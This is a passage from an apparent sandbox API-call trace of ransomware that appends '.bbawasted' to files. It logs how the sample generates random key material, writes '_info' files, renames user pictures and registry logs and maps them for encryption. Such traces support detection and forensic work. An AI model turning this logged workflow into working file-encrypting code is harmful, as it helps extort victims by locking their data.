hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.746] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.746] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0074.746] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2bc) returned 0x5bf070 [0074.746] lstrcpyW (in: lpString1=0x5bf122, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.746] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.746] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.747] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.747] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.747] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.748] SetEndOfFile (hFile=0x120) returned 1 [0074.748] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.748] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.748] lstrcpyW (in: lpString1=0x5bf122, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.bbawasted")) returned 0 [0074.749] GetLastError () returned 0x20 [0074.749] CloseHandle (hObject=0x120) returned 1 [0074.750] lstrcpyW (in: lpString1=0x5bf122, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.750] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.bbawasted_info")) returned 1 [0074.751] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.751] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.752] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.752] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.752] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0074.752] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x306) returned 0x5bf070 [0074.752] lstrcpyW (in: lpString1=0x5bf16c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.752] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.752] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.753] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.753] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.754] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.755] SetEndOfFile (hFile=0x120) returned 1 [0074.755] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.755] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.755] lstrcpyW (in: lpString1=0x5bf16c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.bbawasted")) returned 0 [0074.755] GetLastError () returned 0x20 [0074.755] CloseHandle (hObject=0x120) returned 1 [0074.756] lstrcpyW (in: lpString1=0x5bf16c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.756] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.bbawasted_info")) returned 1 [0074.757] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.757] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.758] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.758] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0074.758] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x306) returned 0x5bf070 [0074.758] lstrcpyW (in: lpString1=0x5bf16c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.758] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.758] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.759] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.759] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.760] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.761] SetEndOfFile (hFile=0x120) returned 1 [0074.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.761] lstrcpyW (in: lpString1=0x5bf16c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.bbawasted")) returned 0 [0074.761] GetLastError () returned 0x20 [0074.761] CloseHandle (hObject=0x120) returned 1 [0074.762] lstrcpyW (in: lpString1=0x5bf16c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.762] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.bbawasted_info")) returned 1 [0074.763] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.763] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.764] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.764] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\62LfZGldE.bmp") returned 66 [0074.764] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28e) returned 0x5bf070 [0074.764] lstrcpyW (in: lpString1=0x5bf0f4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.764] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.764] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.765] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.765] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\62LfZGldE.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\62lfzglde.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.765] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.766] SetEndOfFile (hFile=0x120) returned 1 [0074.766] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.767] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.767] lstrcpyW (in: lpString1=0x5bf0f4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\62LfZGldE.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\62lfzglde.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\62LfZGldE.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\62lfzglde.bmp.bbawasted")) returned 1 [0074.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\62LfZGldE.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\62lfzglde.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.767] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.769] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.770] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be748 | out: pbBuffer=0x5be748) returned 1 [0074.770] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.770] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.770] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.770] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.827] SetEndOfFile (hFile=0x120) returned 1 [0074.829] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.829] CloseHandle (hObject=0x120) returned 1 [0074.830] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.830] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.831] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.831] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\yLKV3TPnhT.png") returned 67 [0074.831] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x290) returned 0x5bebb0 [0074.831] lstrcpyW (in: lpString1=0x5bec36, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.831] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0074.831] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.832] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0074.832] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\yLKV3TPnhT.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\ylkv3tpnht.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.833] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.834] SetEndOfFile (hFile=0x120) returned 1 [0074.834] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.834] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.834] lstrcpyW (in: lpString1=0x5bec36, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\yLKV3TPnhT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\ylkv3tpnht.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\yLKV3TPnhT.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\ylkv3tpnht.png.bbawasted")) returned 1 [0074.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\yLKV3TPnhT.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\ylkv3tpnht.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.836] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.838] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.839] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be748 | out: pbBuffer=0x5be748) returned 1 [0074.839] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.839] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.840] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.840] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.851] SetEndOfFile (hFile=0x120) returned 1 [0074.854] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.854] CloseHandle (hObject=0x120) returned 1 [0074.856] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bebb0 | out: hHeap=0x580000) returned 1 [0074.856] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.857] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.857] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HD3yHKqrSFHzO9-9r_R.png") returned 66 [0074.857] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28e) returned 0x5bebb0 [0074.857] lstrcpyW (in: lpString1=0x5bec34, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.857] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0074.857] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.858] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0074.858] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HD3yHKqrSFHzO9-9r_R.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hd3yhkqrsfhzo9-9r_r.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.859] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.860] SetEndOfFile (hFile=0x120) returned 1 [0074.860] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.860] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.860] lstrcpyW (in: lpString1=0x5bec34, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HD3yHKqrSFHzO9-9r_R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hd3yhkqrsfhzo9-9r_r.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HD3yHKqrSFHzO9-9r_R.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hd3yhkqrsfhzo9-9r_r.png.bbawasted")) returned 1 [0074.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HD3yHKqrSFHzO9-9r_R.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hd3yhkqrsfhzo9-9r_r.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.861] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.862] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.863] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be748 | out: pbBuffer=0x5be748) returned 1 [0074.863] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.863] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.864] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.864] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.906] SetEndOfFile (hFile=0x120) returned 1 [0074.908] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0074.908] CloseHandle (hObject=0x120) returned 1 [0074.910] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bebb0 | out: hHeap=0x580000) returned 1 [0074.910] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.911] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.911] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\-BceFOt4.bmp") returned 68 [0074.911] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5beba0 [0074.911] lstrcpyW (in: lpString1=0x5bec28, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.911] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0074.911] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 